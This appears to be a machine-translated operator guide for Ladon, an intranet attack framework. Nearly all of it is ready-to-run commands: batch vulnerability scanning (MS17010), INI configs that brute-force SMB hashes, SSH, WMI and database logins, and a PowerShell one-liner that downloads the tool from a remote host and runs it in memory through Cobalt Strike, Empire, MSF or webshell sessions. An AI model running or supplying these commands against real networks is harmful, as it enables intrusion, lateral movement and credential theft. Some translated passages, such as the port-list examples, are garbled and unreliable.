17	password scanning	ini configuration	[winrm password blasting of winrmscan.ini ini plug-in]（ http://k8gege.org/Ladon/WinrmScan.html )
18	Information Collection	. NET	[Detect whether the website uses Shiro]（ http://k8gege.org/Ladon/IsShiro.html )
19	Vulnerability scanning	Python	[Domain control right CVE-2020-1472-EXP]（ https://github.com/k8gege/CVE-2020-1472-EXP )
20	exploit	exp generator	[drupal cve-2018-7600]（ http://k8gege.org/p/CVE-2018-7600.html )
21	[CVE-2020-0796]( http://k8gege.org/p/smbghost_cve_2020_0796.html ）	SMBHost Win10 remote vulnerability
22	Vulnerability Exploitation	Exp Generator	[IIS Write Permission Vulnerability Exploitation]（ http://k8gege.org/Ladon/iisput.html )

Document reference Cscan: https://github.com/k8gege/K8CScan/wiki

Intermediate usage

Batch scanning

0x001 Parameter ip/24 ip/16 ip/8

Command: Ladon 192.168.1.8/24 OnlinePC

0x002 file IP txt ip24.txt ip16.txt url. txt host. txt domain. txt str.txt

Create corresponding files in the root directory of the program. For example, use ip.txt for batch scanning of multiple IPs, and use ip24.txt for batch scanning of multiple C segments

There is no need to specify a TXT program to automatically load the file for scanning. For example, to scan a surviving host, just command: Ladon onlinepc

Disable ping scanning

The default scanning will first scan whether the host is alive through ICMP. When using the tool to forward Intranet

Or when ping is disabled on the target machine, use the noping parameter to scan, which is a little slower

Ladon noping

Ladon noping 192.168.1.8/24

Ladon noping 192.168.1.8/24 MS17010

Socks5 Proxy Scan

See: http://k8gege.org/Ladon/proxy.html

KaliLadon under linux/mac os

proxychains mono Ladon noping 192.168.1.8/24 MS17010

proxychains mono Ladon noping http://192.168.1.1 WhatCMS

Ladon.exe under Windows

Proxifier 3.42 and above are recommended, preferably the latest version 4.0.1

Example: scan the target section 10.1.2 for ms17010 vulnerabilities (noping must be added)

Ladon noping 10.1.2.8/24 MS17010

Configure INI to call arbitrary programs and password explosion

Applicable scenario: relevant commands or third-party tools need to be called for batch operation

Or there is a new POC, but it is too late or cannot be written into a DLL to call it

Many third-party tools do not support batch or batch network segments at all

But Ladon is not limited to batch IP, URL, IP segment, any content, etc

It is the most suitable tool for verifying whether there are loopholes in the intranet in an emergency

When new vulnerabilities come, it’s good if you can adjust the POC well. It takes more time to batch

Call the system ping command to probe the surviving host

ping.ini

[Ladon]

exe=cmd.exe

arg=/c ping $ip$

Command: Ladon ping.ini

Command: Ladon 192.168.1.8/24 ping.ini

Call Python POC to batch detect vulnerabilities

[Ladon]

exe=F:\Python279\python.exe

arg=CVE-2019-11043-POC. py $ip$

example: https://github.com/k8gege/CVE-2019-11043

User defined program password explosion

Example: Call the modified smbexec.exe to verify the HASH password. The original version cannot be exploded without exiting

There are four files in the root directory, smbexec.exe, smbhash.ini, user.txt, and pass.txt.

smbhash.ini

[Ladon]

exe=smbexec.exe

arg=-hashes $pass$ $user$@$ip$

isok=Launching semi-interactive shell

port=445

log=true

INI Parameter Description

Isok: success flag, required. If smbexec succeeds, it returns “Launching semi interactive shell”

Port: corresponding port, not required. If the SMB is 445, Ladon detects that the port is open first, and then performs password blasting

Log: program log; not required. If some programs return a bunch of error results, we don’t want to see them, can we not display them

Check whether intranet segment C uses the same password. Command: Ladon 192.168.1.1/24 smbhash.ini

See: http://k8gege.org/p/53177.html

Configure port scan parameters

Port.txt Custom Port

When using the portscan module, common high-risk vulnerability ports are scanned by default

Can Ladon scan when the default port is modified?

Use port.txt

Format 1: 80,2114333306445

Format 2: 80-88, 21-235800-5900

Format 3:

twenty-one

twenty-three

eighty

Format 4:

80-88

21-23

Command line custom port

Ladon 192.168.1.8/24 PortScan 80-89

Ladon 192.168.1.8-192.168.1.200 PortScan 22,80,1433,21,3306,1521

Configure password blasting parameters

1. It supports standard user.txt and pass.txt account password cracking, and each user needs to run the password correctly or completely

2 Support userpass.txt (to store the user name and corresponding password), which is used to quickly verify whether other machines have the same account password

3. It supports check.txt (storing IP/port/database name/user/password). If the port and database name are not specified, the default is used

User.txt and pass.txt store the user and password respectively

Userpass.txt stores the user password group, that is, each line stores the user and password

Check.txt each line stores IP \ port \ user \ password

Database password detection

The database is different from other password bursts. Sometimes the database has permissions, and the designated user can only connect to the designated database, but not to the default database

MSSQL password verification

(Large intranet may collect a large number of machine passwords from other machines. The first step must be to verify.)

If it is not the default port, please change the following port to the modified port. A single IP can be scanned directly by Ladon IP: port mssqlscan

check.txt

192.168.1.8 1433 master sa k8gege

192.168.1.8 sa k8gege

192.168.1.8 1433 sa k8gege

Command: Ladon MssqlScan

Oracle is the same

192.168.1.8 1521 orcl system k8gege

192.168.1.8 orcl system k8gege

192.168.1.8 system k8gege

Command: Ladon oraclescan

MySQL does not need to specify a database name

192.168.1.8 3306 root k8gege

192.168.1.8 root k8gege

Command: Ladon MysqlScan

System password

SSH password explosion

check.txt

192.168.1.8 22 root k8gege

192.168.1.8 root k8gege

Command: Ladon SshScan

Detailed usage: http://k8gege.org/Ladon/sshscan.html

SMB/WMI password explosion

check.txt

192.168.1.8 admin k8gege

Command: Ladon WmiScan or Ladon SmbScan

NTLM HASH Password Burst

check.txt

192.168.1.8 admin k8gege

Command: Ladon wmiscan or Ladon smbscan

Website password

Weblogic password blasting

check. Txt (URL user password)

http://192.168.1.8:7001/console weblogic k8gege

Command: Ladon weblogicscan

File password

Password explosion of RAR file

Since the RAR compressed package only needs one password, it only needs pass.txt. Note that the Chinese password needs to save TXT as ANSI code

Command: Ladon test rar RarScan

PowerShell

PowerLadon is perfectly compatible with win7-win10 PowerShell. For remote control that does not support plug-in. net programs, you can use

For the PowerShell version, you can also remotely load the memory under the CMD command line to achieve file free scanning. After the module is loaded, its usage is consistent with EXE.

0x001 PowerShell local loading

Suitable for supporting PowerShell interactive remote control or shell, such as cobalt strike

> powershell 

> Import-Module .\Ladon.ps1

> Ladon OnlinePC

0x002 Cmd Local Load

It is applicable to remote control or shell that has not kept up with the times and only supports CMD interaction

> powershell Import-Module .\Ladon. ps1; Ladon OnlinePC

0x003 Cmd Remote Load

It is applicable to remote control or shell that has not kept up with the times and only supports CMD interaction

> powershell "IEX (New-Object Net.WebClient).DownloadString(' http://192.168.1.5:800/Ladon.ps1 '); Ladon OnlinePC"

0x004 remote control interactive CMD

0x005 Kitchen knife non interactive CMD

0x006 Empire non interactive CMD

There is a problem with the shell of Empire. The semicolon is truncated. You can add CMD / C

0x007 MSF Interactive CMD

Advanced usage

Ladon was originally designed as a scanning framework, with built-in functions for convenience

After all, it is troublesome to upload one more file to the target if you need to use one function

Unlike MSF, most frameworks and modules don’t matter, because you only use them locally

In order to allow everyone to customize the module, Ladon plug-in supports multiple programming languages

You can configure plug-ins through INI to learn that HTTP can generate POC through the EXP generator

Know programming, can use C #, Delphi, VC to write DLL and PowerShell scripts

0x001 exp generator

Exp generator tutorial: https://github.com/k8gege/Ladon/wiki/LadonExp-Usage

Practical examples: https://github.com/k8gege/Ladon/wiki/%E6%BC%8F%E6%B4%9E%E6%89%AB%E6%8F%8F -CVE-2018-2894

0x002 user defined module tutorial

Custom module tutorial: https://github.com/k8gege/Ladon/wiki/Ladon-Diy-Moudle

0x003 plug in example source code

https://github.com/k8gege/Ladon/raw/master/MoudleDemo.rar

Complete tutorial: http://k8gege.org/Ladon

Ladon Download

Historical version: https://github.com/k8gege/Ladon/releases

911 version: https://k8gege.org/Download